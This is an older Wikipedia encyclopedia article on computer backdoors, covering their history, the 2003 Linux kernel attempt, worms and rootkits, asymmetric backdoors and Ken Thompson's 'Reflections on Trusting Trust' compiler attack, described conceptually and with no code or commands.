Backdoor (computing)

From Wikipedia, the free encyclopedia

A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device.

Contents

[edit] Overview

The threat of backdoors surfaced when multiuser and networked operating systems became widely adopted. Petersen and Turn discussed computer subversion in a paper published in the proceedings of the 1967 AFIPS Conference.[1] They noted a class of active infiltration attacks that use "trapdoor" entry points into the system to bypass security facilities and permit direct access to data. The use of the word trapdoor here clearly coincides with more recent definitions of a backdoor. However, since the advent of public key cryptography the term trapdoor has acquired a different meaning. More generally, such security breaches were discussed at length in a RAND Corporation task force report published under ARPA sponsorship by J.P. Anderson and D.J. Edwards in 1970.[2]

A backdoor in a login system might take the form of a hard coded user and password combination which gives access to the system. A famous example of this sort of backdoor was as a plot device in the 1983 film WarGames, in which the architect of the "WOPR" computer system had inserted a hardcoded password (his dead son's name) which gave the user access to the system, and to undocumented parts of the system (in particular, a video game–like simulation mode).

An attempt to plant a backdoor in the Linux kernel, exposed in November 2003, showed how subtle such a code change can be.[3] In this case a two-line change appeared to be a typographical error, but actually gave the caller to the sys_wait4 function root access to the system.[4]

Although the number of backdoors in systems using proprietary software (that is, software whose source code is not readily available for inspection) is not widely credited, they are nevertheless periodically (and frequently) exposed. Programmers have even succeeded in secretly installing large amounts of benign code as Easter eggs in programs, although such cases may involve official forbearance, if not actual permission.

It is also possible to create a backdoor without modifying the source code of a program, or even modifying it after compilation. This can be done by rewriting the compiler so that it recognizes code during compilation that triggers inclusion of a backdoor in the compiled output. When the compromised compiler finds such code, it compiles it as normal, but also inserts a backdoor (perhaps a password recognition routine). So, when the user provides that input, he gains access to some (likely undocumented) aspect of program operation. This attack was first outlined by Ken Thompson in his famous paper Reflections on Trusting Trust (see below).

Many computer worms, such as Sobig and Mydoom, install a backdoor on the affected computer (generally a PC on broadband running insecure versions of Microsoft Windows and Microsoft Outlook). Such backdoors appear to be installed so that spammers can send junk e-mail from the infected machines. Others, such as the Sony/BMG rootkit distributed silently on millions of music CDs through late 2005, are intended as DRM measures — and, in that case, as data gathering agents, since both surreptitious programs they installed routinely contacted central servers.

A traditional backdoor is a symmetric backdoor: anyone that finds the backdoor can in turn use it. The notion of an asymmetric backdoor was introduced by Adam Young and Moti Yung in the Proceedings of Advances in Cryptology: Crypto '96. An asymmetric backdoor can only be used by the attacker who plants it, even if the full implementation of the backdoor becomes public (e.g., via publishing, being discovered and disclosed by reverse engineering, etc.). Also, it is computationally intractable to detect the presence of an asymmetric backdoor under black-box queries. This class of attacks have been termed kleptography; they can be carried out in software, hardware (for example, smartcards), or a combination of the two. The theory of asymmetric backdoors is part of a larger field now called cryptovirology.

There exists an experimental asymmetric backdoor in RSA key generation. This OpenSSL RSA backdoor was designed by Young and Yung, utilizes a twisted pair of elliptic curves, and has been made available.

[edit] Reflections on Trusting Trust

Ken Thompson's Reflections on Trusting Trust[5] was the first major paper to describe black box backdoor issues, and points out that trust is relative. It described a very clever backdoor mechanism based upon the fact that people only review source (human-written) code, and not compiled machine code. A program called a compiler is used to create the second from the first, and the compiler is usually trusted to do an honest job.

Thompson's paper described a modified version of the Unix C compiler that would:

  • Put an invisible backdoor in the Unix login command when compiled, and as a twist
  • Also add this feature undetectably to future compiler versions upon their compilation as well.

Because the compiler itself was a compiled program, users would be extremely unlikely to notice the machine code instructions that performed these tasks. (Because of the second task, the compiler's source code would appear "clean".) What's worse, in Thompson's proof of concept implementation, the subverted compiler also subverted the analysis program (the disassembler), so that anyone who examined the binaries in the usual way would not actually see the real code that was running, but something else instead. This version was never released into the wild. It was released to a sibling Bell Labs organization as a test case; they never found the attack.[citation needed]

In theory, once a system has been compromised with a backdoor or Trojan horse, such as the Trusting Trust compiler, there is no way for the "rightful" user to regain control of the system. However, several practical weaknesses in the Trusting Trust scheme have been suggested. (For example, a sufficiently motivated user could painstakingly review the machine code of the untrusted compiler before using it. As mentioned above, there are ways to counter this attack, such as subverting the disassembler; but there are ways to counter that defense, too, such as writing your own disassembler from scratch, so the infected compiler won't recognize it.)

[edit] References

  1. ^ H.E. Petersen, R. Turn. "System Implications of Information Privacy". Proceedings of the AFIPS Spring Joint Computer Conference, vol. 30, pages 291–300. AFIPS Press: 1967.
  2. ^ Security Controls for Computer Systems, Technical Report R-609, WH Ware, ed, Feb 1970, RAND Corp.
  3. ^ Linux-Kernel Archive: Re: BK2CVS problem
  4. ^ Thwarted Linux backdoor hints at smarter hacks; Kevin Poulsen; SecurityFocus, 6 November 2003.
  5. ^ Reflections on Trusting Trust

[edit] External links